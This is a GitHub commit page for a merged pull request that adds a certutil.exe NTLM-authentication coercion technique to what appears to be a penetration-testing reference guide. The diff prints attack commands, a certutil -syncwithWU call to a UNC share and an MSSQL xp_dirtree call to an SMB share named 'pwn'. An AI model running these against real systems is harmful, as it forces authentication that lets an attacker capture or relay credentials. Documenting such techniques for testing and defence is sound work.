Skip to content

Commit

Permalink
Merge pull request #719 from nuts7/certutil-ntlmcoerce-newtech
Browse files Browse the repository at this point in the history
Add NTLM auth coerce technique (certutil.exe)
  • Loading branch information
carlospolop authored Oct 11, 2023
2 parents a0e0e09 + 6a6ccd9 commit 6b6da2a
Showing 1 changed file with 8 additions and 0 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -93,6 +93,14 @@ EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
### Certutil
It's possible to use certutil.exe lolbin (Microsoft-signed binary) to coerce NTLM authentication:
```bash
certutil.exe -syncwithWU \\127.0.0.1\share
```
## HTML injection
### Via email
Expand Down

0 comments on commit 6b6da2a

Please sign in to comment.